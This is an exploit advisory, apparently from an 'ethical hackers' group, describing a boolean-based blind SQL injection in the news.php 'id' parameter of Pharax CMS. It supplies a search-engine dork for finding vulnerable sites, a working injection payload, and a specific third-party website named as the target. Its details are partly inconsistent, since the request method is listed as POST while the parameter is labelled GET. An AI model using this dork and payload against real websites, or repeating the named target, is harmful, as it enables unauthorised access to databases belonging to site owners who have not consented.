[+] Exploit Title ; Pharax cms Sql Injection vulnerability
[+] Date : 2018-02-24
[+] Author : 0P3N3R From IRANIAN ETHICAL HACKERS
[+] Vendor Homepage : http://pharax.com/
[+] Dork : intext:"Designed By Pharax"
[+] Forum : irethicalhackers.com/forums
[+] Tested On : windows 10 - kali linux 2.0
[+] Contact : https://telegram.me/WebServer
[+] Description :
[!] Pharax is a personal content management
[+] Poc :
[+] Security Level :
[!] Medium
[+] Exploitation Technique:
[!] Remote
[+] Request Method :
[!] POST
[+] Vulnerability Files :
[!] news.php
[+] web application technology: Apache
[+] back-end DBMS: MySQL
[+] Parameter: id (GET)
[!] Type: boolean-based blind
[!] Title: AND boolean-based blind - WHERE or HAVING clause
[!] Payload: id=397 AND 1351=1351
[+] Target :
[!] http://wagpa.ir/news.php?id=397
[+] Fix :
[!] Restrict user input or replace bad characters
[+] We Are : [+] 0P3N3R [+] Mehrdad_Ice [+] S0!HP